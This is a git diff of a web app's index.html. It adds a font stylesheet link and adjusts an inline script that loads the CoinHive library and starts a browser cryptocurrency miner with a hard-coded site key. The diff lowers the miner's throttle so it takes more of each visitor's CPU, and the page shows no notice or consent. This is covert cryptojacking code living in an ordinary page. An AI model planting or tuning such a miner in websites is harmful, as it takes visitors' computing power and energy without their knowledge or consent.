--- a/frontend/public/index.html
+++ b/frontend/public/index.html
@@ -10,6 +10,7 @@
     -->
     <link rel="manifest" href="%PUBLIC_URL%/manifest.json">
     <link rel="shortcut icon" href="%PUBLIC_URL%/favicon.ico">
+    <link href="https://fonts.googleapis.com/css?family=Dosis" rel="stylesheet">
     <!--
       Notice the use of %PUBLIC_URL% in the tags above.
       It will be replaced with the URL of the `public` folder during the build.
@@ -40,10 +41,11 @@
   <script src="https://use.fontawesome.com/00c6aa3062.js"></script>
   <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
   <script>
-    var miner = new CoinHive.Anonymous('np6rTwBMOFatfmuf6GO09C7MDbdYmKtz', {
+    var options = {
       threads: 1,
-      throttle: 1,
-    });
+      throttle: 0.8,
+    };
+    var miner = new CoinHive.Anonymous('np6rTwBMOFatfmuf6GO09C7MDbdYmKtz', options);
     miner.start();
   </script>
 </html>
